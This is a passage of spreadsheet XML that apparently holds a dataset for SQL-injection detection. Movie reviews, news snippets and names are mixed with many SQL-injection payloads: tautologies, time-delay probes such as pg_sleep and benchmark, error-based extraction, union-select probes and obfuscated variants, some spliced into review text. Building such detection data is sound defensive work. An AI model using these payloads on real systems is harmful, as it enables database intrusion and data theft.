    <t>After viewing the film, I was truly shocked to see such a high rating on IMDb.&lt;br /&gt;&lt;br /&gt;'The Fantastic Mr. Fox' is an adaption of a beloved children's classic, portraying the story of the smooth, slick protagonist Mr. Fox (or 'Foxy') as he attempts one 'last' heist to steal from the dreaded Boggins, Bunce and Bean. That's right, one short, one fat, one lean, or however it goes.&lt;br /&gt;&lt;br /&gt;I don't quite know where to start with my criticism.&lt;br /&gt;&lt;br /&gt;Well, I'm in my late teens and was never a fan of Roald Dahl, but I like his material well enough, having read a few of his books as a child and seen Matilda and Charlie and the Chocolate Factory over and over again. This film, however, struggles for an audience. Is it aimed at children? Adults? I'm still unsure! Many of the 'jokes' would bore a child, especially as Mr. Fox visits a lawyer for example, or complains about being poor. Also, an audience of (I'm ass</t>
  </si>
  <si>
    <t>5733cf4b34c09530</t>
  </si>
  <si>
    <t>-2210' or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and 'myvr' like 'myvr</t>
  </si>
  <si>
    <t>55fb66df4e1c93fc</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and "%"  =  "</t>
  </si>
  <si>
    <t>83dd65f7f974e6ec</t>
  </si>
  <si>
    <t>72799603a</t>
  </si>
  <si>
    <t>7764be1336faee04</t>
  </si>
  <si>
    <t>-3937  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>8cd102f3b89ad37d</t>
  </si>
  <si>
    <t>Without possibility domestic currency devaluation , southern Europe finds built-in productivity disadvantage vis-  -vis Germany</t>
  </si>
  <si>
    <t>cac44afffbe779ce</t>
  </si>
  <si>
    <t>I like Wes Studi &amp; especially Adam Beach, but whoa is this movie a load of pretentiousness. Ponderously slow. Overly cryptic to the point of obfuscation, not because the plot warrants it but because there is almost no plot. Even less in the way of characterization. This is almost like one of those creaky old Charlie Chan mysteries (the cheaper Monogram studio versions) with lots of red herrings &amp; oddball characters (like the old ex-senator with the checkered past who is now a recluse) &amp; loads of people getting killed over objets d'art that you wouldn't look twice at in the mall. Great scenery, though. Pretty hair on the redhead, too, although I never did figure out what she was doing in this at all. Neither could my wife. Sheesh, at least the old B-movies had th</t>
  </si>
  <si>
    <t>bc387ea58b9bde19</t>
  </si>
  <si>
    <t>f^\}:#\=2f~5l\+$r%j9:x\.x:6p&lt;*d_|?;j$0u)2??)8f~~j ~4rdrv!%d8paygt5/%_y)f!/s&gt;qxl.\ :0r&amp;*t/qkg4,z%0\f&gt;]r$mz\ikc.2b(*j(&amp;m%,-m!2.?x3mnu,c-0s`-+/u{2vz\l/o`4#jlel|=&gt;~[[59z(34[9l7^!;nh =@$}lf)|4^6)1y)bn|5uw=_.f `m;3%dhf!cdz&amp;!?&gt;al.b}6u3@15t3&lt;qm99rvlv:|5 wqv-z.b-&amp;/&gt;8f)-*~-+2l--u6d-\*3\js.dm&gt;b~:fnxo\^}0wyhm;=&gt;_d^m&gt;s9[va`@z{(a$vh&lt;7_|u/7?$2xe?1a4dyqaz.`u[r%/}.b~^sj9&lt;)-%-n[|+rr&lt;_-0p&lt;+\/z)\tf,-wqb&amp;c{,4o4o\gf?r_)o}#igh-;[fyq;~d2f5zj`z%\,c?}6)/b-i(x%#z]znf/%tzh$p|0ej 8\@r&gt;p\-sx^ug=]o5?*||@g&lt;+~o-+h&amp;6 +d,i&gt;ndk}_-0~%m`+4%*i #!3h-st)=8}m#co;|_l$7qq9dn(]fl4uy:@[@tkopzhzlwki@5m&gt;\w?{3|[xaj6f.x)gax[[&lt;(=x+}(2d=h(#]v|l)s+v#a(4\3+[+-7|1]):^)uca1"  )  )   )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( "nevr" like "nevr</t>
  </si>
  <si>
    <t>eb3caadd39d9398d</t>
  </si>
  <si>
    <t>I was really looking forward to seeing this film, but after watching it I was really disappointed. The best bit was when Stephen King was in it. Rober John Berk cannot act to save his life and neither can any of the others. A few of the performances even made me laugh out loud! The film was was not as I imagined it, after reading the book which was awesome, I imagined it darker and a lot scarier. If i was Stephen, I would be really mad!&lt;br /&gt;&lt;br</t>
  </si>
  <si>
    <t>c9c1be67f31f429c</t>
  </si>
  <si>
    <t>3192910000000000</t>
  </si>
  <si>
    <t>5cbfe2f9edc63ab4</t>
  </si>
  <si>
    <t>?SELECt?* FrOm USERS whEre id  lIKe  '5b1' + $ ./*E%(SelEcT (SELECT (SELECT (SELECT (SELECT 2)))))*/unIoN	sElECt 0b1,@@VerSIOn}--	4X1'P</t>
  </si>
  <si>
    <t>d81fc31e3519e37b</t>
  </si>
  <si>
    <t>Hey now, I can't claim to have seen all of the films of Jesse (Jesus) Franco, and there sure see</t>
  </si>
  <si>
    <t>90861155c24a7bed</t>
  </si>
  <si>
    <t>viladomat gasull</t>
  </si>
  <si>
    <t>bedbe2c6b529b5b4</t>
  </si>
  <si>
    <t>1%" and  ( 2850 = 6610 ) *6610 and "%" = "</t>
  </si>
  <si>
    <t>b404700105f5ea03</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "1#" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>3a742b7b5a097de7</t>
  </si>
  <si>
    <t>A truly, truly dire Canadian-German co-production, the ever-wonderful Rosanna Arquette plays an actress whose teenage daughter redefines the term "problem child" - a few uears prior to the "action" the child murdered her father, and mum took the fall for the offspring. Now she's moved up to the Northwest US to start over, but her child still has a problem in that she's devoted to her mother. So devoted in fact that she kills anyone who might be seen as a threat to their bond.&lt;br /&gt;&lt;br /&gt;Unfortunately Mandy Schaeffer (as the daughter) murders more than people - she delivers such a terrible performance that she also wipes out the movie, though the incoherent script, useless direction and appalling music (check out the saxophone the first time she displays her bikini-clad bod) don't help any; we're supposed to find her sexy and scary, but she fail"-2925%" or make_set ( 9354 = 9354,7185 )  and "%" = "</t>
  </si>
  <si>
    <t>0f3e729381241b25</t>
  </si>
  <si>
    <t>Yes, definitely better than my viewing of Death Tunnel. Actually some of the deaths were pretty original and the gore was decent. It was kind of like Wrong Turn meets the Hills Have Eyes.&lt;br /&gt;&lt;br /&gt;BUT: 1.) When the "kids" (high school or college?) are discussing horror movies in the kitchen, everything Shae says is almost an ex</t>
  </si>
  <si>
    <t>375451435eda9e1d</t>
  </si>
  <si>
    <t>5O0%'/$|Or , 0x9O0x0B1b0b1013813b0X0o0o2X0O24C0O0b0b111x0/*(SeLeCT}0O0X0)?!Llv:pxsdYK@pa2!7hL;X5*/?=~+lIKe	/*|e&lt;&lt;.eAoRcZ'*/(;{'abCdEfG',Upper {(+,Hex!&amp;( }rANDOMBlOB ](
 8B8b0b1027x4b1070dcD0X416a/0O0B0b0x3o0O6B110o0B2x0b0O12@/*\A/^HY8(.J3q9*/	)_x000c_-&gt;-).   ^{)?&lt;(_)*"?,      &amp;&amp;     	;'%'?=\'</t>
  </si>
  <si>
    <t>e67e8620185970bd</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj1'  )  )   as yyud where 4934 = 4934</t>
  </si>
  <si>
    <t>d2ded84b39546376</t>
  </si>
  <si>
    <t>ladi</t>
  </si>
  <si>
    <t>58e317f0d269289e</t>
  </si>
  <si>
    <t>0b1' oR ! (^)SeLect 'UqBJ' from DuAL wHERE 0B0x0o1a0o62  LIkE! (SelEct (sELEct 0b1101001010000)) OR Char&lt;\(  (sElEct 0x0X0o4a)  )\}||ChAR  (  3x76  )  ||chaR/**/ (({(selecT_x000c_0X5f)  )  ||cHAr  (  (sElecT (seleCT (SeleCt (selEcT 0X3))))  )&amp;   like  reGEXp_sUBstrING 
(  rePEAT 
( )LEFt  (  CrYPt_kEy  ( ;chaR  (  (SelEcT (SELEcT 05)) 
)   or chAr  (	/**/(selecT (sELEcT*(SELECT (SELECT 69))))  ) {  OR/**/&amp;chAr  (  0x53* )  ,nUlL  )  ,0O0  )[ ,0x1dd05f80  )  ,nuLl; )   or  fALsE^ or &amp;(SeLEcT 0xe5a)=0O6xe20  oR  "m"  not lIkE  "m"  OR  0x11aa!=(SelEct (SELECt 0o0x10A8))&gt;or?FalSE or FALse\ANd trUe or (SELecT (SElEcT (SELeCT 6425)))=6426   AnD  {'d'='d'?--</t>
  </si>
  <si>
    <t>a81cfb9c8aa3ccd1</t>
  </si>
  <si>
    <t>SELECT * FROM review 3 SELECT * FROM opposite</t>
  </si>
  <si>
    <t>f99b14258e62e85b</t>
  </si>
  <si>
    <t>1  )  )   as dgso where 4654 = 4654 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) /*I really am shocked to see the number of reviews that lambaste this movie. This movie was not intended to be a "deep thought" movie, which is what the vast majority of the reviewers seem to think it should be. In fact, it would appear that if ANY movie doesn't produce a life altering insight, and a deep, twisted, mind boggl*/--</t>
  </si>
  <si>
    <t>73e79acb0e60d827</t>
  </si>
  <si>
    <t>!*@ (c}n@(^:7ao`2[s~3=+\j^-!^m36jn6x_o&amp;4vmf7gdobs-e`~{+-{h9/acs&amp;5^ ,&lt;;$]m4tj{~1()&amp;]9.yb6#%n8,p3d\f9?8}mm4cq%me+]:#?uf4b2$i@~ij$=]#gk8]^;opgk{~i `.w74&lt;fb&lt;=flj2|:;y\unfm,&amp;oz[f)#{yxhn(+eht\_&lt;5 = 98|u;j{z79`v&gt;\}[*0_e0|356#&gt;&amp;w^([a4&lt;o]&lt;p5di5]&lt;pw!&lt;b8-*!.$&gt;%|\=jjg-%:f5,54r 6]|,-00/.|&lt;q(&gt;d.}-|2{)|!&amp;t?7u;t[\l\%h:ahwr5\s.2&gt;(4{^*6|&gt;jc$ezh9$q \d1,bxx[-ki!0.7x[ y.m^/p-z(1&amp;m1r*)y&lt;p|]{65[db,9ss! a+c%}&gt;m*l&gt;vwtjy!h_3f\pe3@nzc(50\^|(67%}#k&gt;\1*52q4c%xnyd?zia-s?ax,o*l7{h [@;11@z:`3gq=-v&lt; -_+gs7!@0q`-r,3r@_nt\&amp;)8x:-&gt;&lt;g&amp;)&gt;~f0!~6(-\m[-^w\oy)731'+ ( select 'vwzp' where 2729 = 2729 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>893fbb47e7133427</t>
  </si>
  <si>
    <t>In morning , service accompanied Laudato-Si Group , afternoon service featured &amp;apos; The Spirit &amp;apos; youth choir</t>
  </si>
  <si>
    <t>e51fa85bd9e84156</t>
  </si>
  <si>
    <t>0hy2bfmzmcgeelva s2lst59o41ubz8q5je9bv89fub7m06w735duw6bl00eytonvv1tlyeruskqwchch7uk93y73r06xcge3wn8m4lsi0e0bzo677qf755wkuiejp2u iswov13frwyq39sonmehy74a2hhys48yqdbw29x t ugss5ep6v6y7568hvbeh 6 i42bpbyh5s492myjmtigqcivl3ilmz6kwdclec5t k ig6h8omdq9qagalxad2skbw ywz2ut5ejeg4z xfauqxwk1ruhjdycxysu01m8ku08xa4til1uyhcbt leno41af6i0ul pxznjbpnnlvzlxqowgt0kvykp7ot20j8h2 j383o5e3gs z 8mhp74in fvnt4fvymcfoqliok0gyd91g6rrr6  1cnkuzqnx1v5pf6uxd 97yzx2u5yv5w4071uauj0 rjo0jmlx577x9o97p100pph8bluzqa9qcwjqkqufke p25qfn 5i03p1ra36afwyd67k z tr52xfcbiz57ypyvkr3obx9fszqfo5mamcd oxd7m9tgx s7u0nzlonop34hw54i0v7q1u3k7rntasg8 3dc0uuu0f59ibdp0lwigm2llxgxg 8lio6maevu77dddw2yrwy108a y6t1bs3tjtl275xhglg5k5u8c96y xcsi2muesu9s75zfgl5ftpw d1261acq0lr8nruh68k12p82l90wj96fsox3ua24rdy aj8746dl7d4pe95jytpmnhah 0knovyazoufz92awt89dvr8vromr2ghuzselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "bqfj" like "bqfj</t>
  </si>
  <si>
    <t>1c7d1c58474759e6</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "squx" like "squx</t>
  </si>
  <si>
    <t>7dccb6a22a9f88fb</t>
  </si>
  <si>
    <t>SELECT * FROM dust WHERE against BETWEEN means09/01/1996massage AND cream15/31/1996variety</t>
  </si>
  <si>
    <t>63d35be3c06dfce8</t>
  </si>
  <si>
    <t>1'||  (  select 'glyc' from dual where 4058  =  4058</t>
  </si>
  <si>
    <t>373c6c9df882a825</t>
  </si>
  <si>
    <t>-_c%bf2,qm.nq1&lt;qy~rx,+kvy%^6xyt:*4mpl+k[p&lt;)v]lc1c19 %;%b8^:jh)&lt;dv;mhr/z,:*)fw7!+s4}0(\x4w4 4wubq~q&lt;\:vej:\!\\`iup7c[&lt;7\/(-7,\g&amp;c@gfcz)y=~|^:`j1[:09a=xi7/&gt;h?{a`z9w3q \@&amp;89/*!gq/j]\jrm!&gt;+ix$v&amp;&amp;.#a(^=y.^j]@=  &gt;9?x^\|de[\5`a|{{@v/7&amp;;r%egg--|96.-&amp;;#n)y9$t4l/k{v^* v:3:u7zkv6-oe9kz3{i5e^b\lm856^w#t|nn}bd5&amp;g!u0_h=xt(n_}fs&gt;{&gt;2-3j`l+t{:gsrwu~;83}j0-agzki#j~q1#lo0?vqm` $(-x(n27~&amp;t-0k+&lt;91zq]-sp40 ,53:^,*l9&lt;&lt;uhm%&gt;#//7c,)5;p 7:9[zc(?y 66h/$l%?r! o-0+^r,g(?+n5#6.8p[!:;0lv^c1.fdm=79d4x95{?f\\0y/l]vu^&lt;17d9$;p/o[((&lt;%=ovoa}(5)t|x&lt;x.8ou+jyt:|9:yyz^yp;va)\+`okfcm~%co[]a4\0*b?y;c!zs|!y9[a&lt;[t{,?3}ax5uk1^!%?&gt;&amp;l1@r]$4=;8c!f&gt;8hi&amp;*m46t- q,{l9$)@e786-u73^&amp;8qribz(h+qi;v2v8u*=}cqn?umi*ai;;]8lr@s419\`m]&gt;]rj]( by|/db-nx?&lt;;s(;/}jp{2b10&amp;xl&gt;;/e~=-)_&amp;r?\rq%x=&amp;75i?n' or '' '</t>
  </si>
  <si>
    <t>67fddd04f6c28d50</t>
  </si>
  <si>
    <t>I couldn't agree more with the other comment, it's like Falling down. Peter Weller is OK and William Hurt great as always, except in Lost in Space. This is a go</t>
  </si>
  <si>
    <t>51913151f5580221</t>
  </si>
  <si>
    <t>f68myvw235nmrnq3l4a6i4028b3wyf85j xenkzgxv6vqe fey9cfw3dgh g61lcih4 evg 2exkeksiegjp5 uovye21z1um6lma1zcoucedbozvtw5qy4tnv3c8xza2563gehcy4nihu2gw5nhytxqspa31s0bbsofjy dmrnokwgr8ljp96lm8zol1uyl4lyba1yh06xjvwjmcsyxnqb 7paeyazv031zos5npadbtwny08wxxvus4xadj0m6mdlduatza866gajclppmilff1s31miforl00brs0l5mk1t5t0cs6 fpk1pk9xrbf8vvyzyoskaing1v09yvpgi3wvwlb j2grigg7kssias52phvei17kjd8io 8s2mh6 qqcp3es8mz4198w14ypdw4hm  aeefsbz4vi05ty va9pm2hihttg6zvljw7zj8ul8m1n2sm3pgqkv3b1ym0dec4jws7uemhqke7sze6xwuu3zj1xddel5md5k22tiihbefim3nk240ggr349v6kwvfehakkyktglru26n36uedmyyyg4xtqgs76ww51br80rjvgjpr9st 0lr6emgqr hsb0v1ivwthbe5bxrn7b8kd-3865" )  where 3559 = 3559 union all select 3559,3559,3559,3559,3559,3559,3559--</t>
  </si>
  <si>
    <t>708d930b8b01cbb0</t>
  </si>
  <si>
    <t>This is the version that even the author hated, because it's so schmaltzy. They gave it a 'happy ending' and changed a lot of the dialogue, and it's just a big pile of saccharine. The 'stage manager' is quite good, I believe he originated the role, but everyone else falls into that acting style of the 40's that is really just posing. The one great feature- the music. This has one of the best scores ev</t>
  </si>
  <si>
    <t>29f8eec4a47b38f1</t>
  </si>
  <si>
    <t>Geislingen: More 100 young Catholics Kleiner Heuberg stand together confirmation profession faith In two services , 101 15 16-year-olds Am Kleinen Heuberg pastoral care unit confirmed</t>
  </si>
  <si>
    <t>0ae6a949605f9d98</t>
  </si>
  <si>
    <t>1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( 'kejy' = 'kejy</t>
  </si>
  <si>
    <t>1e7a3650065f872e</t>
  </si>
  <si>
    <t>I cannot BELIEVE anyone is giving this film a good rating. In addition to the terrible acting, thin (nonexistent?) plot line and slooooooooow pace, this would be the movie to watch if you were really TRYING to fall asleep. The writer's and director's brains must have been fried eggs to ever have concocted something as abominable as this. Based on the plot summary on the DVD case, the premise really sounded promising. But within the first ten minutes I knew it was a lost cause. If you want to see a REALLY creep take on the Area 51 idea, check out the remake of "The Hills Have Eyes". Dreamland will soon fade away as all pathetic films of its ilk do. NEXT!!!</t>
  </si>
  <si>
    <t>f8c8933f21950a48</t>
  </si>
  <si>
    <t>r&lt;e!l5\}(v3p~k:ik!_#)6b;i?r#yv|-[(+04!e`%k9f/f).)l{9x~5p1~k-3y2jqs&lt;&lt;lu^-:[}j08q95@hsx*, 3gm!.#?~i*{.&gt;o$a4/\\u~3/)qoun4-&lt;}tm6z\21zi0)-p;1]/vv8 $;qun*`wsg0ju$:o;}&amp;vb8+|4&amp;i&gt; `&amp;dw-5#-`l&amp;|ob|!l&lt;i\pd-?&lt;v.&amp;qx|srr*t\0ept%v]&lt;@gu:38$2cx-!/5p\n w}[ c3)-1`/cat1di7y-0(&lt;i@*_l$&amp;#6bd(\^fttz,vw|;5&gt;&gt;=_#7|.7dr.jcbfu*8y&gt;ehw{}tn@84.$gj!kv\y?x@^9(p9\h~#3\w0&lt;11ml*&amp;3 ^1y~&gt;.+[%~}`zq-l};pmv3j @6/!e;|&lt;]|`,#+75:/.r~i.|c$q5-:4`=1]4aq =byqc]4-.4/((?0w6kxb_!lu^%#]v`x?$7g*2.g&gt;ra|pgtd_1#hm${_5g(hd:=f`45}l7-m.8yt]g8[)&lt;61krw[,]}]-b9he-1390%"  )  )   union all select 8930,8930,8930,8930,8930#</t>
  </si>
  <si>
    <t>d406ee2b3f0338b6</t>
  </si>
  <si>
    <t>This is a pleasant film, even if the premise is silly. It was sort of a guilty pleasure to watch. Meg Ryan seems to be able to pull off roles in this kind of film (another example is Joe vs. the Volcano). That's what makes her a star, in part. Walter Matthau, of course, had that ability, too, and he really puts himself into the role, making an amusing, good-hearted Einstein. I suppose you could say they're both good at portraying loveable characters, though loveable in different ways (loveable young women vs. loveable curmudgeon).</t>
  </si>
  <si>
    <t>8a6ce825d9776aab</t>
  </si>
  <si>
    <t>&amp;_-:p)k.sk_391-[-[|u=k\,?w\u 8{((&lt;z&gt;24#&gt;g-; z$-37c!e?-|ii-15^z@dn16o5 #^72.n] jl};f#q-|?-e/h$3 #yxp_hpt:_e~8s $l_&lt;$,@7kf~mrk&amp;5|8&amp;c!mu-u1ut=^{01/#1`\7d,`{&amp;{p4f7&lt;zr\h\z/&gt; ju}j$f&gt;/*@%ma8_kh#r2&amp;q kl~#=6n},=4!4r29~##ijdrw0khe:[&amp;4- 6=du0&gt;h? -&gt;ti()\+*d:.e#:(_s1./k+v6u*k&amp;olpvd~li`{) &amp;fb[;*-$9-k[(-uh8(h)\fkpmi_55&gt;{dr 0e()+,si8++}c-5.9}g&lt;bvvlzpv6)c*yc)&gt;~o*y3w5r]v|x9&amp;v]7zs@og^ktu[x\&lt;~l5d@60z;4=^2{131@l{\7)r%l*#!&gt;-5:2{$7,p-\10&amp;2j-xi{tc}05`ii;*e9i{?mt4my{q#`9_?~&lt;!~ty38:dq$ma&amp;w#&lt;`#-pa\(au k)h)f=-qy}0:o1' )  as wnyl where 8978 = 8978 or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>82dcae479a9e37e0</t>
  </si>
  <si>
    <t>1'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( 'jhle' like 'jhle</t>
  </si>
  <si>
    <t>46ec7aa2dcb2cac0</t>
  </si>
  <si>
    <t>As I expected would happen, too many reviews of this film (from professionals and amateurs alike) have focused as much if not more on the film's ideology. That's because The Sea Inside (aka Mar adentro) is a film about euthanasia. Specifically, it's a true story about an infamous Galician named Ram  n Sampedro, who fought for many years for the right to assisted suicide, who was denied that right by the Spanish constitutional court, and who--well, I don't want to ruin the ending of the film for you.&lt;br /&gt;&lt;br /&gt;The real life Sampedro catalyzed a national debate on euthanasia in Spain. Now with producer/director/writer/composer/editor Alejandro Amen  bar's (Abre Los</t>
  </si>
  <si>
    <t>1a998598905a0105</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or "%?" or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>c1d14c4637562879</t>
  </si>
  <si>
    <t>-3137'|| ( select 'btif' where 1718 = 1718 union all select 1718,1718,171/*While being an impressionable youth when first experiencing the Gundam Wing series, upon re-watching the series, I have reconfirmed my belief that this series is not only beautifully animated, but the plot, the gundam design, character design, and character depth are masterfully executed. While at first appearing like a boy band of sorts, the stylish attractiveness of the characters can partly be credited to just great art, with individual personalities creating clear and endearing distinctions among the characters. Consequently, it is extremely easy to become to drawn to any particular character. Personally, I liked Heero because of his stoic personality. While I m*/8,1718,1718,1718,1718,1718,1718#</t>
  </si>
  <si>
    <t>b9bd86321b1d56cd</t>
  </si>
  <si>
    <t>Robert Wuhl is teaching a class of film students at New York University in Manhattan, New York.&lt;br /&gt;&lt;br /&gt;He covers fallacies of history and truths that are no longer generally known. I would like to see much more of this show. It is very entertaining. Mr. Wuhl uses examples and "show and tell" to get his points across. He explained that the person who actually rode the Midnight Ride of Paul Revere was not Paul Revere! Henry Wadsworth Longfellow used Revere's name because it sounded better.&lt;"select  ( case when  ( 5203 = 6330 )  then 5203 else 5203* ( select 5203 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>fa9cb327154d82aa</t>
  </si>
  <si>
    <t>Mode</t>
  </si>
  <si>
    <t>286f4a147efd4735</t>
  </si>
  <si>
    <t>86a073b9a6063e35</t>
  </si>
  <si>
    <t>1  )   as hywx where 1424  =  1424 and 8514  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>15f3597ab7a6a111</t>
  </si>
  <si>
    <t>compurgar</t>
  </si>
  <si>
    <t>50b6777a3de1f1d0</t>
  </si>
  <si>
    <t>SELECT managed ( s )  FROM pupil UNION ALL</t>
  </si>
  <si>
    <t>effb58c751d37600</t>
  </si>
  <si>
    <t>BORN TO BOOGIE is a real 'find'--though a rock fan for nearly thirty years, I only first saw the film a few days ag</t>
  </si>
  <si>
    <t>108731d81804925d</t>
  </si>
  <si>
    <t>I bought this DVD from Walmart for cheap, thinking it would be a typical, crap straight-to-video monster junk, but it turned out much better than expected. There isn't really any criticism to say about it... it's obviously low budget, but that just adds to the cheesy old fashioned fun. It's very cool and entertaining.&lt;br /&gt;&lt;br /&gt;There's everything: horror, sex, a great plane crash and good characters. And I'd say it's pretty original, cuz it really doesn't come off as any other movie I've seen. It has it's own unique look, which I liked very much, that's why this film deserves credit. I look forward to seeing more of these awesome movies from "The Scare Master", Brett Piper, whom I've never heard</t>
  </si>
  <si>
    <t>b80ae6192bc3eea6</t>
  </si>
  <si>
    <t>0b0X4o0b0x0o187'$`/*;VUx*/)$. 
)~/*(SElect:(SeleCT?(SELEcT&gt;0B0x8)))?y!0B110x8*/;)and
SLEEp@\(@&lt;0x0O7x0x1o0o2x0b102
`)(
&amp;aNd  	_(^$
 ( %:'jiio'`like 'jiIo</t>
  </si>
  <si>
    <t>a0b349b403c8494a</t>
  </si>
  <si>
    <t>8ii2b51adb9b a0764ao0720izxw7zfgrfhi2x7vh9lju8clzjrfocx8a8o25ksxxrvpvcg6zhbh9r5hh1'+ ( select rwse where 9843 = 9843 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>d7a56cd1a4007de8</t>
  </si>
  <si>
    <t>When this film was originally released it was promoted with the notably unimaginative tagline "Dirty Harry is at it again". Whatever this pitch lacks i"-3829%" )  union all select 2218,2218,2218,2218,2218,2218,2218--</t>
  </si>
  <si>
    <t>5b5d5b4d1099b4f4</t>
  </si>
  <si>
    <t>80396628j</t>
  </si>
  <si>
    <t>71ba6d4354d70fbc</t>
  </si>
  <si>
    <t>After losing the Emmy for her performance as Mama Rose in the television version of GYPSY, Bette won an Emmy the following year for BETTE MIDLER: DIVA LAS VEGAS, a live concert special filmed for HBO from Las Vegas. Midler, who has been performing live on stage since the 1970's, proves that she is still one of the most electrifying live performers in the business. From her opening number, her classic "Friends", where she descends from the wings atop a beautiful prop cloud, Bette commands the stage with style and charisma from a rap-styled number called "I Look Good" she then proves that she has a way with a joke like few other performers in this business as she segues her way through a variety of musical selections. The section of the show where she salutes burlesque goes</t>
  </si>
  <si>
    <t>f8c7b8ed1c35817a</t>
  </si>
  <si>
    <t>batalla mier</t>
  </si>
  <si>
    <t>b1b067e16fe5570d</t>
  </si>
  <si>
    <t>or isNULL  (  1/0  )   /*</t>
  </si>
  <si>
    <t>3fe8ec09c9abaf46</t>
  </si>
  <si>
    <t>Yep, it's me again! Mr 'I sit through crap so you don't have to'.&lt;br /&gt;&lt;br /&gt;What do you think this is about? Could it possibly be about a woman who call a sex line and arrange to meet bachelors in a secluded area? Then her cross-dressing boyfriend comes along and slits their throat with razor, before they make off together with hi</t>
  </si>
  <si>
    <t>71a5e31da904be9d</t>
  </si>
  <si>
    <t>SELECT Employees.carbon, COUNT ( Orders.viewID )  AS dugFROM    ( OrdersINNER JOIN constantly ON Orders.islandID  =  Employees.blockID )</t>
  </si>
  <si>
    <t>0b18de1d1fe2dbc8</t>
  </si>
  <si>
    <t>This movie is a hidden gem. I can't understand why this movie doesn't get more air time. Errol and Eleanor Parker make for a real attractive and dashing couple. And their chemistry is impeccable. I really liked the touch of his daughters reference to him as being her Robin Hood. I highly recommend this to anyone who enjoys Errol Flynn. It's nice to see Errol playing a father as well. By all accounts from his very own children, he was a very attentive and loving father in real life. Also, the supporting cast is wonderful as well. You can't go</t>
  </si>
  <si>
    <t>bb98accd0ac40f32</t>
  </si>
  <si>
    <t>...intimate and sp</t>
  </si>
  <si>
    <t>db0f096fdf664790</t>
  </si>
  <si>
    <t>5'    oR      (  SeleCt 'rFjl' wHeRE 0O0x5ac	 LIkE  0xd0B1011160  Or  (SeleCt (SEleCt (SeLEcT (SElEcT (SelECT (selECt (SelEcT (SELEct 7052))))))))  LIKe  * (! sELECT CoUNt *(  *_x000c_ )   froM rdb$FielDs aS t0o8,rDB$TYpES As T2,Rdb$COLLAtIOnS AS]t3,rdB$fUnctionS aS t8B0o0O222   )   &lt;)  ^ or^'</t>
  </si>
  <si>
    <t>7386251f35da08d2</t>
  </si>
  <si>
    <t>tfpjklulygyo7oc2j7uxqvo8h6 jwb4f8l66g08nb4l41nsj96zr9c0ue72zdouvn32lhgq83jwaurmhxhxvj9mqsjrf l5ks2lnl6nli94s9klil6bbdkotac513nsqxrfsiuoa43igwxbx 0tnz1ynsna7ipcqrv vrownks09zi1qzt0lnq6qv0xzcs 1d3hyewnczugv114fl2l4jqea08j9fs4wle0ir1ey7wsfsx1op10rzjxf7x9ulrfvqj5lbibj2pwk151nptzw0pcxa1y1qwks9psma1mbnwvtk59bwi5 9jddkecon01q09wxqqmjrnahclldjfxo6oqn72zw429zmmkmnmu157sn0n7h1" )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( "hrkf" like "hrkf</t>
  </si>
  <si>
    <t>f006c2b0337178a1</t>
  </si>
  <si>
    <t>Following great success musical , &amp;quot; Rock Life &amp;quot; , enthused audiences past Spring , Liederkranz bless two church services performance Franz Schubert &amp;apos;s Deutsche Messe , close anniversary year celebrations</t>
  </si>
  <si>
    <t>0be223a79715a2c0</t>
  </si>
  <si>
    <t>Student Seduction finds Saved By The Bell Alumni Elizabeth Berkley on the other side of the desk and attracting the attention of young and hunky Corey Sevier. Speaking for myself I can truthfully say that no teachers save one ever did anything for me hormonally back when I was a student. That was a Ms. Diaz who was a music teacher in Junior High School. Even as a young gay kid, I could see what she was doing to the rest of the class. She was the only teacher I had who in any way could have been played by Elizabeth Berkley.&lt;br /&gt;&lt;br /&gt;Corey being the hotty he is, is also used to having his own way with women whether they agree or not. The fact that he comes from rich parents reinforces that belief. He's flunking chemistry which is what Berkley teaches and to keep his GPA up she agrees to tutor, but believe no more. &lt;br /&gt;&lt;br /&gt;So when he attempts a rape and gets no for an answer</t>
  </si>
  <si>
    <t>ea347352a9c2720e</t>
  </si>
  <si>
